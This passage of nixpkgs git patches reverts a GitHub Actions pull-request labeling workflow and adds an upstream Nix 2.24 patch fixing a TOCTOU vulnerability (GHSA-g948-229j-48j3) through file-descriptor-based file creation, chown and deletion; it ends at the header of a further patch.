Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Tue, 24 Jun 2025 14:00:20 +0000 Subject: [PATCH 57/73] Revert "workflows/labels: manage stale & merge conflict labels" --- .github/workflows/labels.yml | 361 ++++++++++++++--------------------- 1 file changed, 147 insertions(+), 214 deletions(-) diff --git a/.github/workflows/labels.yml b/.github/workflows/labels.yml index c3bc9301f67f..83cf0511fc5e 100644 --- a/.github/workflows/labels.yml +++ b/.github/workflows/labels.yml @@ -17,12 +17,18 @@ on: NIXPKGS_CI_APP_PRIVATE_KEY: required: true workflow_dispatch: + inputs: + updatedWithin: + description: 'Updated within [hours]' + type: number + required: false + default: 0 # everything since last run concurrency: # This explicitly avoids using `run_id` for the concurrency key to make sure that only - # *one* scheduled run can run at a time. + # *one* non-PR run can run at a time. group: labels-${{ github.workflow }}-${{ github.event_name }}-${{ github.event.pull_request.number }} - # PR-triggered runs will be cancelled, but scheduled runs will be queued. + # PR- and manually-triggered runs will be cancelled, but scheduled runs will be queued. cancel-in-progress: ${{ github.event_name != 'schedule' }} # This is used as fallback without app only. @@ -63,6 +69,8 @@ jobs: - name: Labels from API data and Eval results uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1 + env: + UPDATED_WITHIN: ${{ inputs.updatedWithin }} with: github-token: ${{ steps.app-token.outputs.token || github.token }} script: | @@ -93,9 +101,6 @@ jobs: github.hook.wrap('request', async (request, options) => { // Requests to the /rate_limit endpoint do not count against the rate limit. if (options.url == '/rate_limit') return request(options) - // Search requests are in a different resource group, which allows 30 requests / minute. - // We do less than a handful each run, so not implementing throttling for now. - if (options.url.startsWith('/search/')) return request(options) stats.requests++ if (['POST', 'PUT', 'PATCH', 'DELETE'].includes(options.method)) return writeLimits.schedule(request.bind(null, options)) @@ -123,68 +128,102 @@ jobs: const reservoirUpdater = setInterval(updateReservoir, 60 * 1000) process.on('uncaughtException', () => clearInterval(reservoirUpdater)) - async function handle(item) { - try { - const log = (k,v,skip) => { - core.info(`#${item.number} - ${k}: ${v}` + (skip ? ' (skipped)' : '')) - return skip - } + if (process.env.UPDATED_WITHIN && !/^\d+$/.test(process.env.UPDATED_WITHIN)) + throw new Error('Please enter "updated within" as integer in hours.') - log('Last updated at', item.updated_at) - stats.prs++ - log('URL', item.html_url) + const cutoff = new Date(await (async () => { + // Always run for Pull Request triggers, no cutoff since there will be a single + // response only anyway. 0 is the Unix epoch, so always smaller. + if (context.payload.pull_request?.number) return 0 - const pull_number = item.number - const issue_number = item.number + // Manually triggered via UI when updatedWithin is set. Will fallthrough to the last + // option if the updatedWithin parameter is set to 0, which is the default. + const updatedWithin = Number.parseInt(process.env.UPDATED_WITHIN, 10) + if (updatedWithin) return new Date().getTime() - updatedWithin * 60 * 60 * 1000 - // The search result is of a format that works for both issues and pull requests and thus - // does not have all fields of a full pull_request response. Notably, it is missing `head.sha`, - // which we need to fetch the workflow run below. When triggered via pull_request event, - // this field is already available. - // This API request is also important for the merge-conflict label, because it triggers the - // creation of a new test merge commit. This is needed to actually determine the state of a PR. - const pull_request = item.head ? item : (await github.rest.pulls.get({ - ...context.repo, - pull_number - })).data + // Normally a scheduled run, but could be workflow_dispatch, see above. Go back as far + // as the last successful run of this workflow to make sure we are not leaving anyone + // behind on GHA failures. + // Defaults to go back 1 hour on the first run. + return (await github.rest.actions.listWorkflowRuns({ + ...context.repo, + workflow_id: 'labels.yml', + event: 'schedule', + status: 'success', + exclude_pull_requests: true + })).data.workflow_runs[0]?.created_at ?? new Date().getTime() - 1 * 60 * 60 * 1000 + })()) + core.info('cutoff timestamp: ' + cutoff.toISOString()) - const run_id = (await github.rest.actions.listWorkflowRuns({ - ...context.repo, - workflow_id: 'pr.yml', - event: 'pull_request_target', - status: 'success', - exclude_pull_requests: true, - head_sha: pull_request.head.sha - })).data.workflow_runs[0]?.id ?? - // TODO: Remove this after 2025-09-17, at which point all eval.yml artifacts will have expired. - (await github.rest.actions.listWorkflowRuns({ + // To simplify this action's logic we fetch the pull_request data again below, even if + // we are already in a pull_request event's context and would have the data readily + // available. We do this by filtering the list of pull requests with head and base + // branch - there can only be a single open Pull Request for any such combination. + const prEventCondition = !context.payload.pull_request ? undefined : { + // "label" is in the format of `user:branch` or `org:branch` + head: context.payload.pull_request.head.label, + base: context.payload.pull_request.base.ref + } + + const prs = await github.paginate( + github.rest.pulls.list, + { + ...context.repo, + state: 'open', + sort: 'updated', + direction: 'desc', + ...prEventCondition + }, + (response, done) => response.data.map(async (pull_request) => { + try { + const log = (k,v,skip) => { + core.info(`PR #${pull_request.number} - ${k}: ${v}` + (skip ? ' (skipped)' : '')) + return skip + } + + if (log('Last updated at', pull_request.updated_at, new Date(pull_request.updated_at) < cutoff)) + return done() + stats.prs++ + log('URL', pull_request.html_url) + + const run_id = (await github.rest.actions.listWorkflowRuns({ ...context.repo, - // In older PRs, we need eval.yml instead of pr.yml. - workflow_id: 'eval.yml', + workflow_id: 'pr.yml', event: 'pull_request_target', - status: 'success', + // For PR events, the workflow run is still in progress with this job itself. + status: prEventCondition ? 'in_progress' : 'success', exclude_pull_requests: true, head_sha: pull_request.head.sha - })).data.workflow_runs[0]?.id + })).data.workflow_runs[0]?.id ?? + // TODO: Remove this after 2025-09-17, at which point all eval.yml artifacts will have expired. + (await github.rest.actions.listWorkflowRuns({ + ...context.repo, + // In older PRs, we need eval.yml instead of pr.yml. + workflow_id: 'eval.yml', + event: 'pull_request_target', + status: 'success', + exclude_pull_requests: true, + head_sha: pull_request.head.sha + })).data.workflow_runs[0]?.id - // Newer PRs might not have run Eval to completion, yet. - // Older PRs might not have an eval.yml workflow, yet. - // In either case we continue without fetching an artifact on a best-effort basis. - log('Last eval run', run_id ?? '') + // Newer PRs might not have run Eval to completion, yet. We can skip them, because this + // job will be run as part of that Eval run anyway. + if (log('Last eval run', run_id ?? '', !run_id)) + return; - const artifact = run_id && (await github.rest.actions.listWorkflowRunArtifacts({ - ...context.repo, - run_id, - name: 'comparison' - })).data.artifacts[0] + const artifact = (await github.rest.actions.listWorkflowRunArtifacts({ + ...context.repo, + run_id, + name: 'comparison' + })).data.artifacts[0] - // Instead of checking the boolean artifact.expired, we will give us a minute to - // actually download the artifact in the next step and avoid that race condition. - // Older PRs, where the workflow run was already eval.yml, but the artifact was not - // called "comparison", yet, will skip the download. - const expired = !artifact || new Date(artifact?.expires_at ?? 0) < new Date(new Date().getTime() + 60 * 1000) - log('Artifact expires at', artifact?.expires_at ?? '') - if (!expired) { + // Instead of checking the boolean artifact.expired, we will give us a minute to + // actually download the artifact in the next step and avoid that race condition. + // Older PRs, where the workflow run was already eval.yml, but the artifact was not + // called "comparison", yet, will be skipped as well. + const expired = new Date(artifact?.expires_at ?? 0) < new Date(new Date().getTime() + 60 * 1000) + if (log('Artifact expires at', artifact?.expires_at ?? '', expired)) + return; stats.artifacts++ await artifactClient.downloadArtifact(artifact.id, { @@ -193,82 +232,39 @@ jobs: repositoryOwner: context.repo.owner, token: core.getInput('github-token') }, - path: path.resolve(pull_number.toString()), + path: path.resolve(pull_request.number.toString()), expectedHash: artifact.digest }) - } - // Create a map (Label -> Boolean) of all currently set labels. - // Each label is set to True and can be disabled later. - const before = Object.fromEntries( - (await github.paginate(github.rest.issues.listLabelsOnIssue, { - ...context.repo, - issue_number - })) - .map(({ name }) => [name, true]) - ) - - const approvals = new Set( - (await github.paginate(github.rest.pulls.listReviews, { - ...context.repo, - pull_number - })) - .filter(review => review.state == 'APPROVED') - .map(review => review.user?.id) - ) - - const latest_event_at = new Date( - (await github.paginate( - github.rest.issues.listEventsForTimeline, - { + // Create a map (Label -> Boolean) of all currently set labels. + // Each label is set to True and can be disabled later. + const before = Object.fromEntries( + (await github.paginate(github.rest.issues.listLabelsOnIssue, { ...context.repo, - issue_number, - per_page: 100 - } - )) - // We also ignore base_ref_force_pushed, which will not happen in nixpkgs, but - // is very useful for testing in forks. - .findLast(({ event }) => !['labeled', 'unlabeled', 'base_ref_force_pushed'].includes(event)) - ?.created_at ?? item.created_at - ) - const stale_at = new Date(new Date().setDate(new Date().getDate() - 180)) + issue_number: pull_request.number + })) + .map(({ name }) => [name, true]) + ) - // Manage most of the labels, without eval results - const after = Object.assign( - {}, - before, - { - // We intentionally don't use the mergeable or mergeable_state attributes. - // Those have an intermediate state while the test merge commit is created. - // This doesn't work well for us, because we might have just triggered another - // test merge commit creation by request the pull request via API at the start - // of this function. - // The attribute merge_commit_sha keeps the old value of null or the hash *until* - // the new test merge commit has either successfully been created or failed so. - // This essentially means we are updating the merge conflict label in two steps: - // On the first pass of the day, we just fetch the pull request, which triggers - // the creation. At this stage, the label is likely not updated, yet. - // The second pass will then read the result from the first pass and set the label. - '2.status: merge conflict': !pull_request.merge_commit_sha, - '2.status: stale': !before['1.severity: security'] && latest_event_at < stale_at, - '12.approvals: 1': approvals.size == 1, - '12.approvals: 2': approvals.size == 2, - '12.approvals: 3+': approvals.size >= 3, - '12.first-time contribution': - [ 'NONE', 'FIRST_TIMER', 'FIRST_TIME_CONTRIBUTOR' ].includes(pull_request.author_association), - } - ) + const approvals = new Set( + (await github.paginate(github.rest.pulls.listReviews, { + ...context.repo, + pull_number: pull_request.number + })) + .filter(review => review.state == 'APPROVED') + .map(review => review.user?.id) + ) - // Manage labels based on eval results - if (!expired) { const maintainers = new Set(Object.keys( - JSON.parse(await readFile(`${pull_number}/maintainers.json`, 'utf-8')) + JSON.parse(await readFile(`${pull_request.number}/maintainers.json`, 'utf-8')) ).map(m => Number.parseInt(m, 10))) - const evalLabels = JSON.parse(await readFile(`${pull_number}/changed-paths.json`, 'utf-8')).labels + const evalLabels = JSON.parse(await readFile(`${pull_request.number}/changed-paths.json`, 'utf-8')).labels - Object.assign( - after, + // Manage the labels + const after = Object.assign( + {}, + before, // Ignore `evalLabels` if it's an array. // This can happen for older eval runs, before we switched to objects. // The old eval labels would have been set by the eval run, @@ -276,104 +272,41 @@ jobs: // TODO: Simplify once old eval results have expired (~2025-10) (Array.isArray(evalLabels) ? undefined : evalLabels), { + '12.approvals: 1': approvals.size == 1, + '12.approvals: 2': approvals.size == 2, + '12.approvals: 3+': approvals.size >= 3, '12.approved-by: package-maintainer': Array.from(maintainers).some(m => approvals.has(m)), + '12.first-time contribution': + [ 'NONE', 'FIRST_TIMER', 'FIRST_TIME_CONTRIBUTOR' ].includes(pull_request.author_association), } ) + + // No need for an API request, if all labels are the same. + const hasChanges = Object.keys(after).some(name => (before[name] ?? false) != after[name]) + if (log('Has changes', hasChanges, !hasChanges)) + return; + + // Skipping labeling on a pull_request event, because we have no privileges. + const labels = Object.entries(after).filter(([,value]) => value).map(([name]) => name) + if (log('Set labels', labels, context.eventName == 'pull_request')) + return; + + await github.rest.issues.setLabels({ + ...context.repo, + issue_number: pull_request.number, + labels + }) + } catch (cause) { + throw new Error(`Labeling PR #${pull_request.number} failed.`, { cause }) } + }) + ); - // No need for an API request, if all labels are the same. - const hasChanges = Object.keys(after).some(name => (before[name] ?? false) != after[name]) - if (log('Has changes', hasChanges, !hasChanges)) - return; + (await Promise.allSettled(prs.flat())) + .filter(({ status }) => status == 'rejected') + .map(({ reason }) => core.setFailed(`${reason.message}\n${reason.cause.stack}`)) - // Skipping labeling on a pull_request event, because we have no privileges. - const labels = Object.entries(after).filter(([,value]) => value).map(([name]) => name) - if (log('Set labels', labels, context.eventName == 'pull_request')) - return; - - await github.rest.issues.setLabels({ - ...context.repo, - issue_number, - labels - }) - } catch (cause) { - throw new Error(`Labeling #${item.number} failed.`, { cause }) - } - } - - if (context.payload.pull_request) { - await handle(context.payload.pull_request) - } else { - const workflowData = (await github.rest.actions.listWorkflowRuns({ - ...context.repo, - workflow_id: 'labels.yml', - event: 'schedule', - status: 'success', - exclude_pull_requests: true, - per_page: 1 - })).data - - // Go back as far as the last successful run of this workflow to make sure - // we are not leaving anyone behind on GHA failures. - // Defaults to go back 1 hour on the first run. - const cutoff = new Date(workflowData.workflow_runs[0]?.created_at ?? new Date().getTime() - 1 * 60 * 60 * 1000) - core.info('cutoff timestamp: ' + cutoff.toISOString()) - - const updatedItems = await github.paginate( - github.rest.search.issuesAndPullRequests, - { - q: [ - `repo:"${process.env.GITHUB_REPOSITORY}"`, - 'type:pr', - 'is:open', - `updated:>=${cutoff.toISOString()}` - ].join(' AND '), - // TODO: Remove in 2025-10, when it becomes the default. - advanced_search: true - } - ) - - const allOptions = { - q: [ - `repo:"${process.env.GITHUB_REPOSITORY}"`, - 'type:pr', - 'is:open' - ].join(' AND '), - sort: 'created', - direction: 'asc', - // TODO: Remove in 2025-10, when it becomes the default. - advanced_search: true - } - - const { total_count: total_pulls } = (await github.rest.search.issuesAndPullRequests({ - ...allOptions, - per_page: 1 - })).data - const { total_count: total_runs } = workflowData - const allItems = (await github.rest.search.issuesAndPullRequests({ - ...allOptions, - per_page: 100, - // We iterate through pages of 100 items across scheduled runs. With currently ~7000 open PRs and - // up to 6*24=144 scheduled runs per day, we hit every PR twice each day. - // We might not hit every PR on one iteration, because the pages will shift slightly when - // PRs are closed or merged. We assume this to be OK on the bigger scale, because a PR which was - // missed once, would have to move through the whole page to be missed again. This is very unlikely, - // so it should certainly be hit on the next iteration. - // TODO: Evaluate after a while, whether the above holds still true and potentially implement - // an overlap between runs. - page: total_runs % Math.ceil(total_pulls / 100) - })).data.items - - // Some items might be in both search results, so filtering out duplicates as well. - const items = [].concat(updatedItems, allItems) - .filter((thisItem, idx, arr) => idx == arr.findIndex(firstItem => firstItem.number == thisItem.number)) - - ;(await Promise.allSettled(items.map(handle))) - .filter(({ status }) => status == 'rejected') - .map(({ reason }) => core.setFailed(`${reason.message}\n${reason.cause.stack}`)) - - core.notice(`Processed ${stats.prs} PRs, made ${stats.requests + stats.artifacts} API requests and downloaded ${stats.artifacts} artifacts.`) - } + core.notice(`Processed ${stats.prs} PRs, made ${stats.requests + stats.artifacts} API requests and downloaded ${stats.artifacts} artifacts.`) clearInterval(reservoirUpdater) - name: Log current API rate limits From 3d27c5f2485588fd7f61eb2e0ead168d2b94addc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= Date: Sun, 22 Jun 2025 18:50:02 +0200 Subject: [PATCH 58/73] nix_2_24: add patch for GHSA-g948-229j-48j3 This addresses a TOCTOU (Time-of-Check to Time-of-Use) vulnerability in Nix's build system that could potentially allow privilege escalation or unauthorized file access during the build process. The patch includes: - Safe file operations using file descriptors - Secure temporary directory handling - Safe chown operations - PassAsFile security improvements - Path validation fixes --- pkgs/tools/package-management/nix/default.nix | 1 + .../patches/ghsa-g948-229j-48j3-2.24.patch | 436 ++++++++++++++++++ 2 files changed, 437 insertions(+) create mode 100644 pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.24.patch diff --git a/pkgs/tools/package-management/nix/default.nix b/pkgs/tools/package-management/nix/default.nix index 7d3c6fbfcc59..839b6e0b3127 100644 --- a/pkgs/tools/package-management/nix/default.nix +++ b/pkgs/tools/package-management/nix/default.nix @@ -171,6 +171,7 @@ lib.makeExtensible ( nix_2_24 = commonAutoconf { version = "2.24.14"; hash = "sha256-SthMCsj6POjawLnJq9+lj/UzObX9skaeN1UGmMZiwTY="; + patches = [ ./patches/ghsa-g948-229j-48j3-2.24.patch ]; self_attribute_name = "nix_2_24"; }; diff --git a/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.24.patch b/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.24.patch new file mode 100644 index 000000000000..27b16dc6b8c6 --- /dev/null +++ b/pkgs/tools/package-management/nix/patches/ghsa-g948-229j-48j3-2.24.patch @@ -0,0 +1,436 @@ +From b0fab9f90b397a2b02f41df5f467ae3cf8b91c3c Mon Sep 17 00:00:00 2001 +From: Eelco Dolstra +Date: Thu, 19 Jun 2025 16:20:34 +0200 +Subject: [PATCH] Fixes for GHSA-g948-229j-48j3 +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Squashed commit of the following: + +commit 04fff3a637d455cbb1d75937a235950e43008db9 +Author: Eelco Dolstra +Date: Thu Jun 12 12:30:32 2025 +0200 + + Chown structured attr files safely + +commit 5417ad445e414c649d0cfc71a05661c7bf8f3ef5 +Author: Eelco Dolstra +Date: Thu Jun 12 12:14:04 2025 +0200 + + Replace 'bool sync' with an enum for clarity + + And drop writeFileAndSync(). + +commit 7ae0141f328d8e8e1094be24665789c05f974ba6 +Author: Eelco Dolstra +Date: Thu Jun 12 11:35:28 2025 +0200 + + Drop guessOrInventPathFromFD() + + No need to do hacky stuff like that when we already know the original path. + +commit 45b05098bd019da7c57cd4227a89bfd0fa65bb08 +Author: Eelco Dolstra +Date: Thu Jun 12 11:15:58 2025 +0200 + + Tweak comment + +commit 0af15b31209d1b7ec8addfae9a1a6b60d8f35848 +Author: Raito Bezarius +Date: Thu Mar 27 12:22:26 2025 +0100 + + libstore: ensure that temporary directory is always 0o000 before deletion + + In the case the deletion fails, we should ensure that the temporary + directory cannot be used for nefarious purposes. + + Change-Id: I498a2dd0999a74195d13642f44a5de1e69d46120 + Signed-off-by: Raito Bezarius + +commit 2c20fa37b15cfa03ac6a1a6a47cdb2ed66c0827e +Author: Raito Bezarius +Date: Wed Mar 26 12:42:55 2025 +0100 + + libutil: ensure that `_deletePath` does NOT use absolute paths with dirfds + + When calling `_deletePath` with a parent file descriptor, `openat` is + made effective by using relative paths to the directory file descriptor. + + To avoid the problem, the signature is changed to resist misuse with an + assert in the prologue of the function. + + Change-Id: I6b3fc766bad2afe54dc27d47d1df3873e188de96 + Signed-off-by: Raito Bezarius + +commit d3c370bbcae48bb825ce19fd0f73bb4eefd2c9ea +Author: Raito Bezarius +Date: Wed Mar 26 01:07:47 2025 +0100 + + libstore: ensure that `passAsFile` is created in the original temp dir + + This ensures that `passAsFile` data is created inside the expected + temporary build directory by `openat()` from the parent directory file + descriptor. + + This avoids a TOCTOU which is part of the attack chain of CVE-????. + + Change-Id: Ie5273446c4a19403088d0389ae8e3f473af8879a + Signed-off-by: Raito Bezarius + +commit 45d3598724f932d024ef6bc2ffb00c1bb90e6018 +Author: Raito Bezarius +Date: Wed Mar 26 01:06:03 2025 +0100 + + libutil: writeFile variant for file descriptors + + `writeFile` lose its `sync` boolean flag to make things simpler. + + A new `writeFileAndSync` function is created and all call sites are + converted to it. + + Change-Id: Ib871a5283a9c047db1e4fe48a241506e4aab9192 + Signed-off-by: Raito Bezarius + +commit 732bd9b98cabf4aaf95a01fd318923de303f9996 +Author: Raito Bezarius +Date: Wed Mar 26 01:05:34 2025 +0100 + + libstore: chown to builder variant for file descriptors + + We use it immediately for the build temporary directory. + + Change-Id: I180193c63a2b98721f5fb8e542c4e39c099bb947 + Signed-off-by: Raito Bezarius + +commit 962c65f8dcd5570dd92c72370a862c7b38942e0d +Author: Raito Bezarius +Date: Wed Mar 26 01:04:59 2025 +0100 + + libstore: open build directory as a dirfd as well + + We now keep around a proper AutoCloseFD around the temporary directory + which we plan to use for openat operations and avoiding the build + directory being swapped out while we are doing something else. + + Change-Id: I18d387b0f123ebf2d20c6405cd47ebadc5505f2a + Signed-off-by: Raito Bezarius + +commit c9b42462b75b5a37ee6564c2b53cff186c8323da +Author: Raito Bezarius +Date: Wed Mar 26 01:04:12 2025 +0100 + + libutil: guess or invent a path from file descriptors + + This is useful for certain error recovery paths (no pun intended) that + does not thread through the original path name. + + Change-Id: I2d800740cb4f9912e64c923120d3f977c58ccb7e + Signed-off-by: Raito Bezarius + +Signed-off-by: Jörg Thalheim +--- + src/libstore/local-store.cc | 6 +-- + .../unix/build/local-derivation-goal.cc | 46 ++++++++++++++---- + .../unix/build/local-derivation-goal.hh | 20 ++++++++ + src/libutil/file-system.cc | 47 +++++++++++-------- + src/libutil/file-system.hh | 8 +++- + 5 files changed, 94 insertions(+), 33 deletions(-) + +diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc +index c6e3af456..c5489444e 100644 +--- a/src/libstore/local-store.cc ++++ b/src/libstore/local-store.cc +@@ -187,7 +187,7 @@ void migrateCASchema(SQLite& db, Path schemaPath, AutoCloseFD& lockFd) + txn.commit(); + } + +- writeFile(schemaPath, fmt("%d", nixCASchemaVersion), 0666, true); ++ writeFile(schemaPath, fmt("%d", nixCASchemaVersion), 0666, FsSync::Yes); + lockFile(lockFd.get(), ltRead, true); + } + } +@@ -345,7 +345,7 @@ LocalStore::LocalStore( + else if (curSchema == 0) { /* new store */ + curSchema = nixSchemaVersion; + openDB(*state, true); +- writeFile(schemaPath, fmt("%1%", curSchema), 0666, true); ++ writeFile(schemaPath, fmt("%1%", curSchema), 0666, FsSync::Yes); + } + + else if (curSchema < nixSchemaVersion) { +@@ -394,7 +394,7 @@ LocalStore::LocalStore( + txn.commit(); + } + +- writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, true); ++ writeFile(schemaPath, fmt("%1%", nixSchemaVersion), 0666, FsSync::Yes); + + lockFile(globalLock.get(), ltRead, true); + } +diff --git a/src/libstore/unix/build/local-derivation-goal.cc b/src/libstore/unix/build/local-derivation-goal.cc +index f8824e9ce..82c79f361 100644 +--- a/src/libstore/unix/build/local-derivation-goal.cc ++++ b/src/libstore/unix/build/local-derivation-goal.cc +@@ -526,7 +526,14 @@ void LocalDerivationGoal::startBuilder() + } else { + tmpDir = topTmpDir; + } +- chownToBuilder(tmpDir); ++ ++ /* The TOCTOU between the previous mkdir call and this open call is unavoidable due to ++ POSIX semantics.*/ ++ tmpDirFd = AutoCloseFD{open(tmpDir.c_str(), O_RDONLY | O_NOFOLLOW | O_DIRECTORY)}; ++ if (!tmpDirFd) ++ throw SysError("failed to open the build temporary directory descriptor '%1%'", tmpDir); ++ ++ chownToBuilder(tmpDirFd.get(), tmpDir); + + for (auto & [outputName, status] : initialOutputs) { + /* Set scratch path we'll actually use during the build. +@@ -1110,9 +1117,7 @@ void LocalDerivationGoal::initTmpDir() { + } else { + auto hash = hashString(HashAlgorithm::SHA256, i.first); + std::string fn = ".attr-" + hash.to_string(HashFormat::Nix32, false); +- Path p = tmpDir + "/" + fn; +- writeFile(p, rewriteStrings(i.second, inputRewrites)); +- chownToBuilder(p); ++ writeBuilderFile(fn, rewriteStrings(i.second, inputRewrites)); + env[i.first + "Path"] = tmpDirInSandbox + "/" + fn; + } + } +@@ -1217,11 +1222,9 @@ void LocalDerivationGoal::writeStructuredAttrs() + + auto jsonSh = writeStructuredAttrsShell(json); + +- writeFile(tmpDir + "/.attrs.sh", rewriteStrings(jsonSh, inputRewrites)); +- chownToBuilder(tmpDir + "/.attrs.sh"); ++ writeBuilderFile(".attrs.sh", rewriteStrings(jsonSh, inputRewrites)); + env["NIX_ATTRS_SH_FILE"] = tmpDirInSandbox + "/.attrs.sh"; +- writeFile(tmpDir + "/.attrs.json", rewriteStrings(json.dump(), inputRewrites)); +- chownToBuilder(tmpDir + "/.attrs.json"); ++ writeBuilderFile(".attrs.json", rewriteStrings(json.dump(), inputRewrites)); + env["NIX_ATTRS_JSON_FILE"] = tmpDirInSandbox + "/.attrs.json"; + } + } +@@ -1730,6 +1733,24 @@ void setupSeccomp() + #endif + } + ++void LocalDerivationGoal::chownToBuilder(int fd, const Path & path) ++{ ++ if (!buildUser) return; ++ if (fchown(fd, buildUser->getUID(), buildUser->getGID()) == -1) ++ throw SysError("cannot change ownership of file '%1%'", path); ++} ++ ++void LocalDerivationGoal::writeBuilderFile( ++ const std::string & name, ++ std::string_view contents) ++{ ++ auto path = std::filesystem::path(tmpDir) / name; ++ AutoCloseFD fd{openat(tmpDirFd.get(), name.c_str(), O_WRONLY | O_TRUNC | O_CREAT | O_CLOEXEC | O_EXCL | O_NOFOLLOW, 0666)}; ++ if (!fd) ++ throw SysError("creating file %s", path); ++ writeFile(fd, path, contents); ++ chownToBuilder(fd.get(), path); ++} + + void LocalDerivationGoal::runChild() + { +@@ -3006,6 +3027,15 @@ void LocalDerivationGoal::checkOutputs(const std::mapisBuiltin()) { +diff --git a/src/libstore/unix/build/local-derivation-goal.hh b/src/libstore/unix/build/local-derivation-goal.hh +index bf25cf2a6..69c517c4a 100644 +--- a/src/libstore/unix/build/local-derivation-goal.hh ++++ b/src/libstore/unix/build/local-derivation-goal.hh +@@ -37,6 +37,11 @@ struct LocalDerivationGoal : public DerivationGoal + */ + Path topTmpDir; + ++ /** ++ * The file descriptor of the temporary directory. ++ */ ++ AutoCloseFD tmpDirFd; ++ + /** + * The path of the temporary directory in the sandbox. + */ +@@ -232,9 +237,24 @@ struct LocalDerivationGoal : public DerivationGoal + + /** + * Make a file owned by the builder. ++ * ++ * SAFETY: this function is prone to TOCTOU as it receives a path and not a descriptor. ++ * It's only safe to call in a child of a directory only visible to the owner. + */ + void chownToBuilder(const Path & path); + ++ /** ++ * Make a file owned by the builder addressed by its file descriptor. ++ */ ++ void chownToBuilder(int fd, const Path & path); ++ ++ /** ++ * Create a file in `tmpDir` owned by the builder. ++ */ ++ void writeBuilderFile( ++ const std::string & name, ++ std::string_view contents); ++ + int getChildStatus() override; + + /** +diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc +index 8ec38e73b..554214d66 100644 +--- a/src/libutil/file-system.cc ++++ b/src/libutil/file-system.cc +@@ -247,7 +247,7 @@ void readFile(const Path & path, Sink & sink) + } + + +-void writeFile(const Path & path, std::string_view s, mode_t mode, bool sync) ++void writeFile(const Path & path, std::string_view s, mode_t mode, FsSync sync) + { + AutoCloseFD fd = toDescriptor(open(path.c_str(), O_WRONLY | O_TRUNC | O_CREAT + // TODO +@@ -257,22 +257,29 @@ void writeFile(const Path & path, std::string_view s, mode_t mode, bool sync) + , mode)); + if (!fd) + throw SysError("opening file '%1%'", path); ++ ++ writeFile(fd, path, s, mode, sync); ++ ++ /* Close explicitly to propagate the exceptions. */ ++ fd.close(); ++} ++ ++void writeFile(AutoCloseFD & fd, const Path & origPath, std::string_view s, mode_t mode, FsSync sync) ++{ ++ assert(fd); + try { + writeFull(fd.get(), s); ++ ++ if (sync == FsSync::Yes) ++ fd.fsync(); ++ + } catch (Error & e) { +- e.addTrace({}, "writing file '%1%'", path); ++ e.addTrace({}, "writing file '%1%'", origPath); + throw; + } +- if (sync) +- fd.fsync(); +- // Explicitly close to make sure exceptions are propagated. +- fd.close(); +- if (sync) +- syncParent(path); + } + +- +-void writeFile(const Path & path, Source & source, mode_t mode, bool sync) ++void writeFile(const Path & path, Source & source, mode_t mode, FsSync sync) + { + AutoCloseFD fd = toDescriptor(open(path.c_str(), O_WRONLY | O_TRUNC | O_CREAT + // TODO +@@ -296,11 +303,11 @@ void writeFile(const Path & path, Source & source, mode_t mode, bool sync) + e.addTrace({}, "writing file '%1%'", path); + throw; + } +- if (sync) ++ if (sync == FsSync::Yes) + fd.fsync(); + // Explicitly close to make sure exceptions are propagated. + fd.close(); +- if (sync) ++ if (sync == FsSync::Yes) + syncParent(path); + } + +@@ -318,7 +325,8 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + #ifndef _WIN32 + checkInterrupt(); + +- std::string name(baseNameOf(path.native())); ++ std::string name(path.filename()); ++ assert(name != "." && name != ".." && !name.empty()); + + struct stat st; + if (fstatat(parentfd, name.c_str(), &st, +@@ -359,7 +367,7 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + throw SysError("chmod '%1%'", path); + } + +- int fd = openat(parentfd, path.c_str(), O_RDONLY); ++ int fd = openat(parentfd, name.c_str(), O_RDONLY | O_DIRECTORY | O_NOFOLLOW); + if (fd == -1) + throw SysError("opening directory '%1%'", path); + AutoCloseDir dir(fdopendir(fd)); +@@ -371,7 +379,7 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + checkInterrupt(); + std::string childName = dirent->d_name; + if (childName == "." || childName == "..") continue; +- _deletePath(dirfd(dir.get()), path + "/" + childName, bytesFreed); ++ _deletePath(dirfd(dir.get()), path / childName, bytesFreed); + } + if (errno) throw SysError("reading directory '%1%'", path); + } +@@ -389,14 +397,13 @@ static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & b + + static void _deletePath(const fs::path & path, uint64_t & bytesFreed) + { +- Path dir = dirOf(path.string()); +- if (dir == "") +- dir = "/"; ++ assert(path.is_absolute()); ++ assert(path.parent_path() != path); + +- AutoCloseFD dirfd = toDescriptor(open(dir.c_str(), O_RDONLY)); ++ AutoCloseFD dirfd = toDescriptor(open(path.parent_path().string().c_str(), O_RDONLY)); + if (!dirfd) { + if (errno == ENOENT) return; +- throw SysError("opening directory '%1%'", path); ++ throw SysError("opening directory %s", path.parent_path()); + } + + _deletePath(dirfd.get(), path, bytesFreed); +diff --git a/src/libutil/file-system.hh b/src/libutil/file-system.hh +index ed1112c7e..32b84456d 100644 +--- a/src/libutil/file-system.hh ++++ b/src/libutil/file-system.hh +@@ -148,12 +148,16 @@ Descriptor openDirectory(const std::filesystem::path & path); + std::string readFile(const Path & path); + void readFile(const Path & path, Sink & sink); + ++enum struct FsSync { Yes, No }; ++ + /** + * Write a string to a file. + */ +-void writeFile(const Path & path, std::string_view s, mode_t mode = 0666, bool sync = false); ++void writeFile(const Path & path, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No); ++ ++void writeFile(const Path & path, Source & source, mode_t mode = 0666, FsSync sync = FsSync::No); + +-void writeFile(const Path & path, Source & source, mode_t mode = 0666, bool sync = false); ++void writeFile(AutoCloseFD & fd, const Path & origPath, std::string_view s, mode_t mode = 0666, FsSync sync = FsSync::No); + + /** + * Flush a file's parent directory to disk +-- +2.44.1 + From 639ad310605baa85093cdb0692759aedaaa02780 Mon Sep 17 00:00:00 2001 From: 